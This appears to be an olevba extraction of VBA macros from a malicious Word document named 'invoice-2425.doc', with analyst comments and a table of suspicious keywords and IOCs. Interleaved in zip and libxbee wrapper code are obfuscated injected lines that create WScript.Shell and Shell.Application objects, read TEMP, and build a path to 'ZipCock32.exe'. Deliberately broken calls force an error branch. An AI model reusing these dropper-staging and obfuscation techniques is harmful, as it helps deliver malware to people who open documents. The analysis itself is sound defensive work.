  577.   Optional ByVal SetZipTimeToLatestTime As Boolean = False, _
  578.   Optional ByVal IncludeSystemAndHiddenFiles As Boolean = False, _
  579.   Optional ByVal ExcludeEarlierThanDate As String = "", _
  580.   Optional ByVal IncludeEarlierThanDate As String = "", _
  581.   Optional ByVal IncludeVolumeLabel As Boolean = False, _
  582.   Optional ByVal ArchiveComment As Boolean = False, _
  583.   Optional ByVal ArchiveCommentTextString = Empty, _
  584.   Optional ByVal UsePrivileges As Boolean = False, _
  585.   Optional ByVal ExcludeExtraAttributes As Boolean = False, Optional ByVal SplitSize As String = "", _
  586.   Optional ByVal TempDirPath As String = "") As Boolean
  587.  
  588.   Dim SplitNum As Long
  589.   Dim SplitMultS As String
  590.   Dim SplitMult As Long
  591.  
  592.   ' set some defaults
  593.  ZipOpts.Date = vbNullString
  594.   ZipOpts.szRootDir = vbNullString
  595.   ZipOpts.szTempDir = vbNullString
  596.   ZipOpts.fTemp = 0
  597.   ZipOpts.fSuffix = 0
  598.   ZipOpts.fEncrypt = 0
  599.   ZipOpts.fSystem = 0
  600.   ZipOpts.fVolume = 0
  601.   ZipOpts.fExtra = 0
  602.   ZipOpts.fNoDirEntries = 0
  603.   ZipOpts.fExcludeDate = 0
  604.   ZipOpts.fIncludeDate = 0
  605.   ZipOpts.fVerbose = 0
  606.   ZipOpts.fQuiet = 0
  607.   ZipOpts.fCRLF_LF = 0
  608.   ZipOpts.fLF_CRLF = 0
  609.   ZipOpts.fJunkDir = 0
  610.   ZipOpts.fGrow = 0
  611.   ZipOpts.fForce = 0
  612.   ZipOpts.fMove = 0
  613.   ZipOpts.fDeleteEntries = 0
  614.   ZipOpts.fUpdate = 0
  615.   ZipOpts.fFreshen = 0
  616.   ZipOpts.fJunkSFX = 0
  617.   ZipOpts.fLatestTime = 0
  618.   ZipOpts.fComment = 0
  619.   ZipOpts.fOffsets = 0
  620.   ZipOpts.fPrivilege = 0
  621.   ZipOpts.szSplitSize = vbNullString
  622.   ZipOpts.IncludeListCount = 0
  623.   ZipOpts.szIncludeList = vbNullString
  624.   ZipOpts.ExcludeListCount = 0
  625.   ZipOpts.szExcludeList = vbNullString
  626.   ZipOpts.fRecurse = 0
  627.   ZipOpts.fRepair = 0
  628.   ZipOpts.flevel = 0
  629.  
  630.   If RootDirToZipFrom <> "" Then
  631.     ZipOpts.szRootDir = RootDirToZipFrom
  632.   End If
  633.   ZipOpts.flevel = Asc(CompressionLevel)
  634.   If UpdateSFXOffsets Then ZipOpts.fOffsets = 1
  635.  
  636.   If i_IncludeFiles <> "" Then
  637.     ZipOpts.szIncludeList = i_IncludeFiles
  638.   End If
  639.   If x_ExcludeFiles <> "" Then
  640.     ZipOpts.szExcludeList = x_ExcludeFiles
  641.   End If
  642.  
  643.   If ZipMode = Add Then
  644.     ' default
  645.  ElseIf ZipMode = Delete Then
  646.     ZipOpts.fDeleteEntries = 1
  647.   ElseIf ZipMode = Update Then
  648.     ZipOpts.fUpdate = 1
  649.   Else
  650.     ZipOpts.fFreshen = 1
  651.   End If
  652.   ZipOpts.fRepair = Repair
  653.   If GrowExistingArchive Then ZipOpts.fGrow = 1
  654.   If Move_DeleteAfterAddedOrUpdated Then ZipOpts.fMove = 1
  655.    
  656.   If Verboseness = Quiet Then
  657.     ZipOpts.fQuiet = 1
  658.   ElseIf Verboseness = Verbose Then
  659.     ZipOpts.fVerbose = 1
  660.   End If
  661.  
  662.   If ArchiveComment = False And Not IsEmpty(ArchiveCommentTextString) Then
  663.     MsgBox "Must set ArchiveComment = True to set ArchiveCommentTextString"
  664.     Exit Function
  665.   End If
  666.   If IsEmpty(ArchiveCommentTextString) Then
  667.     ArchiveCommentText = Empty
  668.   Else
  669.     ArchiveCommentText = ArchiveCommentTextString
  670.   End If
  671.   If ArchiveComment Then ZipOpts.fComment = 1
  672.  
  673.   If NoDirEntries Then ZipOpts.fNoDirEntries = 1
  674.   If JunkDirNames Then ZipOpts.fJunkDir = 1
  675.   If Encrypt Then ZipOpts.fEncrypt = 1
  676.   EncryptionPassword = Password
  677.   If JunkSFXPrefix Then ZipOpts.fJunkSFX = 1
  678.   If ForceUseOfDOSNames Then ZipOpts.fForce = 1
  679.   If Translate_LF = LF_To_CRLF Then ZipOpts.fLF_CRLF = 1
  680.   If Translate_LF = CRLF_To_LF Then ZipOpts.fCRLF_LF = 1
  681.   ZipOpts.fRecurse = RecurseSubdirectories
  682.   If IncludeSystemAndHiddenFiles Then ZipOpts.fSystem = 1
  683.  
  684.   If SetZipTimeToLatestTime Then ZipOpts.fLatestTime = 1
  685.   If ExcludeEarlierThanDate <> "" And IncludeEarlierThanDate <> "" Then
  686.     MsgBox "Both ExcludeEarlierThanDate and IncludeEarlierThanDate not " & Chr(10) & _
  687.            "supported at same time"
  688.     Exit Function
  689.   End If
  690.   If ExcludeEarlierThanDate <> "" Then
  691.     ZipOpts.fIncludeDate = 1
  692.     ZipOpts.Date = ExcludeEarlierThanDate
  693.   End If
  694.   If IncludeEarlierThanDate <> "" Then
  695.     ZipOpts.fExcludeDate = 1
  696.     ZipOpts.Date = IncludeEarlierThanDate
  697.   End If
  698.  
  699.   If TempDirPath <> "" Then
  700.     ZipOpts.szTempDir = TempDirPath
  701.     ZipOpts.fTemp = 1
  702.   End If
  703.  
  704.   If SplitSize <> "" Then
  705.     SplitSize = Trim(SplitSize)
  706.     SplitMultS = Right(SplitSize, 1)
  707.     SplitMultS = UCase(SplitMultS)
  708.     If (SplitMultS = "K") Then
  709.         SplitMult = 1024
  710.         SplitNum = Val(Left(SplitSize, Len(SplitSize) - 1))
  711.     ElseIf SplitMultS = "M" Then
  712.         SplitMult = 1024 * 1024&
  713.         SplitNum = Val(Left(SplitSize, Len(SplitSize) - 1))
  714.     ElseIf SplitMultS = "G" Then
  715.         SplitMult = 1024 * 1024 * 1024&
  716.         SplitNum = Val(Left(SplitSize, Len(SplitSize) - 1))
  717.     Else
  718.         SplitMult = 1024 * 1024&
  719.         SplitNum = Val(SplitSize)
  720.     End If
  721.     SplitNum = SplitNum * SplitMult
  722.     If SplitNum = 0 Then
  723.         MsgBox "SplitSize of 0 not supported"
  724.         Exit Function
  725.     ElseIf SplitNum < 64 * 1024& Then
  726.         MsgBox "SplitSize must be at least 64k"
  727.         Exit Function
  728.     End If
  729.     ZipOpts.szSplitSize = SplitSize
  730.   End If
  731.  
  732.   If IncludeVolumeLabel Then ZipOpts.fVolume = 1
  733.   If UsePrivileges Then ZipOpts.fPrivilege = 1
  734.   If ExcludeExtraAttributes Then ZipOpts.fExtra = 1
  735.  
  736.   SetZipOptions = True
  737.    
  738. End Function
  739.  
  740. Public Function ChopNulls(ByVal str)
       ' [analyst] Returns str truncated at its first Chr(0), or str unchanged if it contains
       ' none. The injected statement at listing line 751 runs only on the "no NUL found" path,
       ' which is the path autoopen takes by calling ChopNulls "NNm". The call at listing line
       ' 793 in DisplayVersion would return early if its argument contains a NUL.
  741.   Dim A As Integer
  742.   Dim c As String
  743.    
  744.   For A = 1 To Len(str)
  745.     If Mid(str, A, 1) = Chr(0) Then
  746.       ChopNulls = Left(str, A - 1)
  747.       Exit Function
  748.     End If
  749.   Next
  750.  
       ' [analyst] Injected: obtains the per-process environment variable collection from
       ' WScript.Shell and stores it in the public processEnv. The ProgID and the "Process"
       ' argument are split across string concatenations, so "WScript.Shell" never appears as a
       ' single literal for keyword matching. No read of processEnv appears in the visible
       ' listing; presumably it is used to resolve a temp directory for prompt82 - confirm
       ' against the full dump.
  751. Set processEnv = CreateObject("WScript." + "Shell").Environment("Pro" & "cess")
  752.   ChopNulls = str
  753.    
  754. End Function
  755. Sub DisplayVersion()
  756.  
  757.   ' display version of DLL
  758.  Dim Beta As Boolean
  759.   Dim ZLIB As Boolean
  760.   Dim Zip64 As Boolean
  761.   Dim Flags As String
  762.   Dim A As Integer
  763.  
  764.   ZipVersion.structlen = Len(ZipVersion)
  765.   ZpVersion ZipVersion
  766.   ' Check flag
  767.  If ZipVersion.flag And 1 Then
  768.     Flags = Flags & " Beta,"
  769.     Beta = True
  770.   Else
  771.     Flags = Flags & " No Beta,"
  772.   End If
  773.   If ZipVersion.flag And 2 Then
  774.     Flags = Flags & " ZLIB,"
  775.     ZLIB = True
  776.   Else
  777.     Flags = Flags & " No ZLIB,"
  778.   End If
  779.   If ZipVersion.flag And 4 Then
  780.     Flags = Flags & " Zip64, "
  781.     Zip64 = True
  782.   Else
  783.     Flags = Flags & " No Zip64, "
  784.   End If
  785.   If ZipVersion.encryption Then
  786.     Flags = Flags & "Encryption"
  787.   Else
  788.     Flags = Flags & " No encryption"
  789.   End If
  790.  
  791.   Form1.Caption = "Using Zip32z64.DLL Version " & _
  792.                   ZipVersion.ZipVersion.Major & "." & ZipVersion.ZipVersion.Minor & " " & _
  793.                   ChopNulls(ZipVersion.Beta) & "  [" & ChopNulls(ZipVersion.Date) & "]" & _
  794.                   " - FLAGS: " & Flags
  795.  
  796.   If Not Zip64 Then
  797.     A = MsgBox("Zip32z64.dll not compiled with Zip64 enabled - continue?", _
  798.                vbOKCancel, _
  799.                "Wrong dll")
  800.     If A = vbCancel Then
  801.         End
  802.     End If
  803.   End If
  804.  
  805. End Sub
  806.  
  807. -------------------------------------------------------------------------------
  808. VBA MACRO Module3.bas
  809. in file: invoice-2425.doc - OLE stream: u'Macros/VBA/Module3'
  810. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  811.  
  812. Public Function PointerToString(lngPtr As Long) As String
  813.    Dim strTemp As String
  814.    Dim lngLen As Long
  815.    If lngPtr Then
  816.       lngLen = lstrlenW(lngPtr) * 2
  817.       If lngLen Then
  818.          strTemp = Space(lngLen)
  819.          CopyMemory ByVal strTemp, ByVal lngPtr, lngLen
  820.          PointerToString = Replace(strTemp, Chr(0), "")
  821.       End If
  822.    End If
  823. End Function
  824.  
  825. Public Function ArrayToString(data() As Byte, Optional lb As Integer = -1, Optional ub As Integer = -1) As String
  826.     Dim tmp As String
  827.     Dim i
  828.     If lb = -1 Then lb = LBound(data)
  829.     If ub = -1 Then ub = UBound(data)
  830.     tmp = ""
  831.     For i = lb To ub
  832.         If (data(i) = 0) Then Exit For
  833.         tmp = tmp & Chr(data(i))
  834.     Next
  835.     ArrayToString = tmp
  836. End Function
  837.  
  838. Public Function xbee_pointerToPacket(lngPtr As Long) As String
  839.     Dim p As xbee_pkt
  840.     CopyMemory p, ByVal lngPtr, Len(p)
  841.     xbee_pointerToPacket = p
  842. End Function
  843.  
  844. Public Sub libxbee_load()
  845.     ' this function is simply to get VB6 to call a libxbee function
  846.    ' if you are using any C DLLs that make use of libxbee, then you should call this function first so that VB6 will load libxbee
  847.    xbee_svn_versionRaw
  848. End Sub
  849.  
  850. Public Function xbee_svn_version() As String
  851.     xbee_svn_version = PointerToString(xbee_svn_versionRaw())
  852. End Function
  853.  
  854. Public Function xbee_setupAPI(ByVal port As String, ByVal baudRate As Long, ByVal cmdSeq As String, ByVal cmdTime As Long)
  855.     xbee_setupAPI = xbee_setupAPIRaw(port, baudRate, Asc(cmdSeq), cmdTime)
  856. End Function
  857.  
  858. Public Function xbee_setupDebugAPI(ByVal port As String, ByVal baudRate As Long, ByVal logfile As String, ByVal cmdSeq As String, ByVal cmdTime As Long)
  859.     xbee_setupDebugAPI = xbee_setupDebugAPIRaw(port, baudRate, logfile, Asc(cmdSeq), cmdTime)
  860. End Function
  861.  
  862. Public Sub xbee_ensureMessageID()
       ' Analyst note: as captured, this Sub executes exactly two statements,
       ' the CreateObject call and Exit Sub. It is one of the procedures that
       ' autoopen calls.
  863.  
       ' Stores a Shell.Application COM object in ZDLLPass3, a name that is
       ' not declared in this Sub. olevba's summary lists Shell.Application as
       ' "May run an application (if combined with CreateObject)". Where
       ' ZDLLPass3 is used is not visible in this part of the dump.
  864. Set ZDLLPass3 = CreateObject("Shell.Application")
  865. Exit Sub ' everything below this line is unreachable
       ' The two calls below carry a dot inside what look like
       ' RegisterWindowMessage and xbee_enableCallbacksRaw; presumably filler
       ' left in place to resemble the libxbee VB wrapper. They never run.
  866.     If callbackMessageID = 0 Then
  867.         callbackMessageID = Regist.erWindowMessage("libxbee")
  868.     End If
  869.     xbee_enabl.eCallbacksRaw ActivehWnd, callbackMessageID
  870. End Sub
  871.  
  872. Public Sub xbee_attachCallback(ByVal con As Long, ByVal func As Long)
  873.     Dim t(0 To 1) As Long
  874.     Dim c As String
  875.     If ActivehWnd = 0 Then
  876.         Debug.Print "Callbacks not enabled!"
  877.         Exit Sub
  878.     End If
  879.     xbee_ensureMessageID
  880.     c = CStr(con)
  881.     t(0) = con
  882.     t(1) = func
  883.     On Error Resume Next
  884.     Callbacks.Remove c
  885.     Callbacks.Add t, c
  886.     On Error GoTo 0
  887.     xbee_attachCallbackRaw con
  888. End Sub
  889.  
  890. Public Sub xbee_detachCallback(ByVal con As Long)
  891.     If ActivehWnd = 0 Then
  892.         Debug.Print "Callbacks not enabled!"
  893.         Exit Sub
  894.     End If
  895.     On Error Resume Next
  896.     xbee_detachCallbackRaw con
  897.     Callbacks.Remove CStr(con)
  898. End Sub
  899.  
  900. Public Sub xbee_enableCallbacks(ByVal hWnd As Long)
  901.     If ActivehWnd <> 0 Then
  902.         Debug.Print "Callbacks already enabled!"
  903.         Exit Sub
  904.     End If
  905.     ActivehWnd = hWnd
  906.     OldhWndHandler = SetWindowLong(hWnd, GWL_WNDPROC, AddressOf libxbee.xbee_messageHandler)
  907.     xbee_ensureMessageID
  908. End Sub
  909.  
  910. Public Sub xbee_disableCallbacks()
  911.     Dim id As Variant
  912.     If ActivehWnd = 0 Then
  913.         Debug.Print "Callbacks not enabled!"
  914.         Exit Sub
  915.     End If
  916.     For Each id In Callbacks
  917.         xbee_detachCallback id(0)
  918.     Next
  919.     SetWindowLong ActivehWnd, GWL_WNDPROC, OldhWndHandler
  920.     ActivehWnd = 0
  921.     OldhWndHandler = 0
  922. End Sub
  923.  
  924. '-- Main ZIP32.DLL Subroutine.
  925. '-- This Is Where It All Happens!!!
  926. '--
  927. '-- (WARNING!) Do Not Change This Function!!!
  928. '--
  929. Public Function VBZip32()
       ' Analyst note: autoopen calls this function with no arguments. The
       ' zip-related statements look like filler; the two prompt82
       ' assignments are the ones that do not belong to a zip routine.
  930.    
  931.   Dim retcode As Long
  932.   Dim FileNotFound As Boolean ' never assigned, so the MsgBox branch below cannot run
  933.    
  934.   ' On Error Resume Next '-- Nothing Will Go Wrong :-)
       ' Any run-time error raised below jumps to the ZipError label.
  935.  On Error GoTo ZipError
  936.    
  937.   retcode = 0
       ' Reads the TEMP variable from processEnv (set in ChopNulls) into
       ' prompt82. "TEMP" is assembled from single letters and empty strings;
       ' olevba decodes it in its "VBA string" rows.
  938.     prompt82 = processEnv("T" & "" + "E" + "" + "M" & "P")
  939.   '-- Set Address Of ZIP32.DLL Callback Functions
  940.  '-- (WARNING!) Do Not Change!!! (except as noted below)
       ' FnP.tr looks like FnPtr (as spelled in the commented-out line 947)
       ' with a dot inserted; ZpI.nit and ZpAr.chive further down follow the
       ' same pattern. Presumably these fail at run time so that control
       ' reaches ZipError - TODO confirm in a sandbox.
  941.  ZUSER.ZDLLPrnt = FnP.tr(AddressOf ZDLLPass)
  942.   ZUSER.ZDLLPASSWORD = FnP.tr(AddressOf ZDLLPass)
  943.   ZUSER.ZDLLCOMMENT = FnP.tr(AddressOf ZDLLComm)
  944.   ZUSER.ZDLLSERVICE_NO_INT64 = FnP.tr(AddressOf ZDLLServ)
  945.  
  946.   ' If you need to set destination of each split set this
  947.  'ZUSER.ZDLLSPLIT = FnPtr(AddressOf ZDLLSplitSelect)
  948.  
  949.   '-- Set ZIP32.DLL Callbacks - return 1 if DLL loaded 0 if not
  950.  retcode = ZpI.nit(ZUSER)
  951.   If retcode = 0 And FileNotFound Then
  952.     MsgBox "Probably could not find Zip32z64.DLL - have you copied" & Chr(10) & _
  953.            "it to the System directory, your program directory, " & Chr(10) & _
  954.            "or a directory on your command PATH?"
  955.     VBZip32 = retcode
  956.     Exit Function
  957.   End If
  958.  
  959.   DisplayVersion
  960.    
  961.   If strZipFileNames = "" Then
  962.     ' not using string of names to zip (so using array of names)
  963.    strZipFileNames = vbNullString
  964.   End If
  965.  
  966.   '-- Go Zip It Them Up!
  967.  retcode = ZpAr.chive(zArgc, zZipArchiveName, zZipFileNames, strZipFileNames, ZOPT)
  968.  
  969.   '-- Return The Function Code
  970.  VBZip32 = retcode
  971.  
  972.   Exit Function
  973.  
  974. ZipError:
  975.  
  976.  
       ' Appends "\ZipCock32.exe" to the TEMP path held in prompt82, giving a
       ' file path under the user's temp directory. olevba lists ZipCock32.exe
       ' as an IOC. Nothing in this function downloads, writes or starts that
       ' file; olevba's summary flags Microsoft.XMLHTTP, ADODB.Stream and
       ' SaveToFile, which are not in this part of the dump.
  977. prompt82 = prompt82 & "\" & "ZipCock32." + "e" & "xe"
  978.  
  979. End Function
  980.  
  981. Private Function xbee_messageHandler(ByVal hWnd As Long, ByVal uMsg As Long, ByVal wParam As Long, ByVal lParam As Long) As Long
  982.     If uMsg = callbackMessageID Then
  983.         Dim t As Long
  984.         On Error Resume Next
  985.         Err.Clear
  986.         t = Callbacks.Item(CStr(wParam))(1)
  987.         If Err.Number = 0 Then
  988.             On Error GoTo 0
  989.             xbee_messageHandler = xbee_runCallback(t, wParam, lParam)
  990.             Exit Function
  991.         End If
  992.         On Error GoTo 0
  993.         xbee_logit "Unable to match Connection with active callback!"
  994.     End If
  995.     xbee_messageHandler = CallWindowProc(OldhWndHandler, hWnd, uMsg, wParam, lParam)
  996.     If uMsg = WM_DESTROY And ActivehWnd <> 0 Then
  997.         ' Disable the MessageHandler if the form "unload" event is detected
  998.        xbee_disableCallbacks
  999.     End If
  1000. End Function
  1001.  
  1002. Public Sub xbee_endcon(ByRef con As Long)
  1003.     xbee_endcon2 con
  1004.     con = 0
  1005. End Sub
  1006.  
  1007. Public Function xbee_sendstring(ByVal con As Long, ByVal str As String)
  1008.     xbee_sendstring = xbee_senddata_str(con, str, Len(str))
  1009. End Function
  1010.  
  1011. Public Function xbee_getpacketPtr(ByVal con As Long, ByRef pkt As Long) As Integer
  1012.     Dim ptr As Long
  1013.    
  1014.     ptr = xbee_getpacketRaw(con)
  1015.     If ptr = 0 Then
  1016.         pkt = 0
  1017.         xbee_getpacketPtr = 0
  1018.         Exit Function
  1019.     End If
  1020.    
  1021.     pkt = ptr
  1022.     xbee_getpacketPtr = 1
  1023. End Function
  1024.  
  1025. Public Function xbee_getpacket(ByVal con As Long, ByRef pkt As String) As Integer
  1026.     Dim ptr As Long
  1027.    
  1028.     ptr = xbee_getpacketRaw(con)
  1029.     If ptr = 0 Then
  1030.         xbee_getpacket = 0
  1031.         Exit Function
  1032.     End If
  1033.    
  1034.     pkt = xbee_pointerToPacket(ptr)
  1035.     xbee_free ptr
  1036.    
  1037.     xbee_getpacket = 1
  1038. End Function
  1039. +------------+----------------------+-----------------------------------------+
  1040. | Type       | Keyword              | Description                             |
  1041. +------------+----------------------+-----------------------------------------+
  1042. | AutoExec   | AutoOpen             | Runs when the Word document is opened   |
  1043. | Suspicious | Open                 | May open a file                         |
  1044. | Suspicious | Shell                | May run an executable file or a system  |
  1045. |            |                      | command                                 |
  1046. | Suspicious | Shell.Application    | May run an application (if combined     |
  1047. |            |                      | with CreateObject)                      |
  1048. | Suspicious | CreateObject         | May create an OLE object                |
  1049. | Suspicious | Chr                  | May attempt to obfuscate specific       |
  1050. |            |                      | strings                                 |
  1051. | Suspicious | ADODB.Stream         | May create a text file                  |
  1052. | Suspicious | SaveToFile           | May create a text file                  |
  1053. | Suspicious | Write                | May write to a file (if combined with   |
  1054. |            |                      | Open)                                   |
  1055. | Suspicious | Put                  | May write to a file (if combined with   |
  1056. |            |                      | Open)                                   |
  1057. | Suspicious | Microsoft.XMLHTTP    | May download files from the Internet    |
  1058. | Suspicious | WScript.Shell        | May run an executable file or a system  |
  1059. |            |                      | command (obfuscation: VBA expression)   |
  1060. | Suspicious | Hex Strings          | Hex-encoded strings were detected, may  |
  1061. |            |                      | be used to obfuscate strings (option    |
  1062. |            |                      | --decode to see all)                    |
  1063. | Suspicious | Base64 Strings       | Base64-encoded strings were detected,   |
  1064. |            |                      | may be used to obfuscate strings        |
  1065. |            |                      | (option --decode to see all)            |
  1066. | Suspicious | VBA obfuscated       | VBA string expressions were detected,   |
  1067. |            | Strings              | may be used to obfuscate strings        |
  1068. |            |                      | (option --decode to see all)            |
  1069. | IOC        | UNZIP32.DLL          | Executable file name                    |
  1070. | IOC        | Zip32.DLL            | Executable file name                    |
  1071. | IOC        | ZIP32z64.DLL         | Executable file name                    |
  1072. | IOC        | Zip32z64.DLL         | Executable file name                    |
  1073. | IOC        | Zip32z64.dll         | Executable file name                    |
  1074. | IOC        | ZIP32.DLL            | Executable file name                    |
  1075. | IOC        | ZipCock32.exe        | Executable file name (obfuscation: VBA  |
  1076. |            |                      | expression)                             |
  1077. | VBA string | Remove comment? Hit  | "Remove comment?" & Chr(13) & "Hit No   |
  1078. |            | No to keep existing  | to keep existing comment"               |
  1079. |            | comment              |                                         |
  1080. | VBA string | GET                  | "G" & "E" + "T"                         |
  1081. | VBA string | Both ExcludeEarlierT | "Both ExcludeEarlierThanDate and        |
  1082. |            | hanDate and IncludeE | IncludeEarlierThanDate not " & Chr(10)  |
  1083. |            | arlierThanDate not   | &            "supported at same time"   |
  1084. |            | supported at same    |                                         |
  1085. |            | time                 |                                         |
  1086. | VBA string | WScript.Shell        | ("WScript." + "Shell")                  |
  1087. | VBA string | Process              | ("Pro" & "cess")                        |
  1088. | VBA string | ] - FLAGS:           | "]" &                   " - FLAGS: "    |
  1089. | VBA string | TEMP                 | ("T" & "" + "E" + "" + "M" & "P")       |
  1090. | VBA string | Probably could not   | "Probably could not find Zip32z64.DLL - |
  1091. |            | find Zip32z64.DLL -  | have you copied" & Chr(10) &            |
  1092. |            | have you copied      | "it to the System directory, your       |
  1093. |            | it to the System     | program directory, " & Chr(10) &        |
  1094. |            | directory, your      | "or a directory on your command PATH?"  |
  1095. |            | program directory,   |                                         |
  1096. |            | or a directory on    |                                         |
  1097. |            | your command PATH?   |                                         |
  1098. | VBA string | \ZipCock32.exe       | "\" & "ZipCock32." + "e" & "xe"         |
  1099. +------------+----------------------+-----------------------------------------+